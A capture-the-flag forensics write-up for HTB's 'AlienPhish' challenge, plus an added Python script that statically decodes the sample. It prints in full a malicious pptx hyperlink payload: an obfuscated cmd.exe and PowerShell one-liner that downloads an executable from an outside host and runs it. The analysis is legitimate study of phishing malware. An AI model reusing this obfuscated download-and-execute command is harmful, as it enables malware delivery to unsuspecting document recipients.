Hack The Box’s Cyber Apocalypse 2021 CTF— AlienPhish — Write-up
My colleagues and I took part in the 5-day CTF by HTB in April ’21, where every challenge solved raised a donation to a good cause.
I picked the “AlienPhish” challenge from the “Forensics” section because we were the first team to solve it (thereby gaining the full 1000 points; points decrease with the number of solves).
This is the original challenge:
Unpacking the downloaded zip package, we get “Alien Weaknesses.pptx”. I submitted it to VT since it was neither targeted nor part of my corporate work (if you would like to download the sample, you can get it there): https://www.virustotal.com/gui/file/00abacd6fe8f37d21983c84c0fceb9bf56af8b2ab39a19798b7f773c8d032db0/detection
There were no AV detections on my machine either, since it was not a known file yet; the detections came in 2 days later.
Once I had unzipped the pptx, I loaded the folder in Sublime.
g ~ % unzip Alien\ Weaknesses.pptx
Archive: /Alien Weaknesses.pptx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: ppt/slides/_rels/slide1.xml.rels
inflating: ppt/_rels/presentation.xml.rels
inflating: ppt/presentation.xml
inflating: ppt/slides/slide1.xml
inflating: ppt/slideLayouts/_rels/slideLayout5.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout8.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout10.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout11.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout9.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout6.xml.rels
inflating: ppt/slideMasters/_rels/slideMaster1.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout1.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout2.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout3.xml.rels
inflating: ppt/slideLayouts/_rels/slideLayout7.xml.rels
inflating: ppt/slideLayouts/slideLayout11.xml
inflating: ppt/slideLayouts/slideLayout10.xml
inflating: ppt/slideLayouts/slideLayout3.xml
inflating: ppt/slideLayouts/slideLayout2.xml
inflating: ppt/slideLayouts/slideLayout1.xml
inflating: ppt/slideMasters/slideMaster1.xml
inflating: ppt/slideLayouts/slideLayout4.xml
inflating: ppt/slideLayouts/slideLayout5.xml
inflating: ppt/slideLayouts/slideLayout6.xml
inflating: ppt/slideLayouts/slideLayout7.xml
inflating: ppt/slideLayouts/slideLayout8.xml
inflating: ppt/slideLayouts/slideLayout9.xml
inflating: ppt/slideLayouts/_rels/slideLayout4.xml.rels
inflating: ppt/theme/theme1.xml
extracting: ppt/media/image1.png
extracting: ppt/media/image2.png
extracting: docProps/thumbnail.jpeg
inflating: ppt/presProps.xml
inflating: ppt/tableStyles.xml
inflating: ppt/viewProps.xml
inflating: docProps/app.xml
inflating: docProps/core.xml
We know where the payload would be, since we have already seen it in the preview.
The payload presented is:
Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"
The string “eliftuo” stood out, so I googled it and found the following page where a method of reversing strings was mentioned:
That made sense: rwi meant iwr and ptth meant http. Once the string was reversed, it was a lot clearer:
We see the malicious executable Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe.
Doing a base64 decoding gets us the flag, CHTB{pH1sHiNg_w0_m4cr0s???}!
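As an added example (not part of the original write-up), the Python script below performs the whole decoding chain described above statically, without executing any of it: it URL-decodes the Target attribute (in an unpacked pptx, hyperlink relationships of this kind live in the slide's _rels file, e.g. ppt/slides/_rels/slide1.xml.rels from the listing above), locates the `set yM=…&&for /L %X in (122;-1;0)` pair, replays that loop in Python to rebuild the string from the end one character at a time, checks that the loop bound actually covers the stored string, and then pulls out the iwr download URL and the dropped file name, whose stem it base64-decodes. The only page-specific value is the Target string quoted earlier; because the file name contains `_`, the URL-safe base64 alphabet is the one that decodes it. The function and variable names are my own.

```python
import base64
import re
import urllib.parse

# The hyperlink relationship Target from the write-up above (the only
# page-specific value this script uses), split across lines for readability.
TARGET = (
    "cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;"
    "'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop"
    "&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"
)

# Matches "set <var>=<value>&&for /L %<i> in (<start>;-1;0)": the variable that
# the loop afterwards walks backwards, one character per iteration.
SET_AND_LOOP = re.compile(r"set\s+(\w+)=(.*?)&&for\s+/L\s+%\w+\s+in\s+\((\d+);-1;0\)")


def decode_target(target: str) -> str:
    """Undo the percent-encoding the .rels file applied to the command line."""
    return urllib.parse.unquote(target)


def emulate_cmd_reverse(value: str, start: int) -> str:
    """Replay the cmd.exe loop  for /L %X in (start;-1;0) do set k=!k!!yM:~%X,1!
    Each iteration appends the one-character substring of yM at offset X, so
    walking X from start down to 0 rebuilds the string back to front."""
    out = ""
    for x in range(start, -1, -1):
        out += value[x:x + 1]  # !yM:~%X,1!  -> one char at offset X ("" if out of range)
    return out


def analyze(target: str) -> dict:
    """Static decode of the AlienPhish hyperlink; nothing here is executed."""
    cmdline = decode_target(target)
    m = SET_AND_LOOP.search(cmdline)
    if not m:
        raise ValueError("no set / for-L reversal pattern found")
    var, value, start = m.group(1), m.group(2), int(m.group(3))
    # Sanity check: the loop bound must cover exactly the stored string,
    # otherwise we would be reversing the wrong span.
    if start + 1 != len(value):
        raise ValueError(f"loop bound {start} does not match {len(value)}-char value")
    plain = emulate_cmd_reverse(value, start)

    url = re.search(r"\biwr\s+(\S+)", plain)
    name = re.search(r"'([A-Za-z0-9_\-]+\.exe)'", plain)
    stem = name.group(1)[: -len(".exe")] if name else ""
    # '_' (and '-') in the file name mean the URL-safe base64 alphabet; pad to a
    # multiple of four so a stem without '=' padding still decodes.
    flag = base64.urlsafe_b64decode(stem + "=" * (-len(stem) % 4)).decode() if stem else ""
    return {
        "variable": var,
        "reversed": plain,
        "url": url.group(1) if url else "",
        "dropped_name": name.group(1) if name else "",
        "flag": flag,
    }


if __name__ == "__main__":
    for key, val in analyze(TARGET).items():
        print(f"{key:13}: {val}")
```

The length check is the part worth keeping for other samples of this obfuscator: the `for /L` bound tells you how many characters the script expects to walk, and a mismatch usually means the `set` value was cut or the regex grabbed the wrong variable.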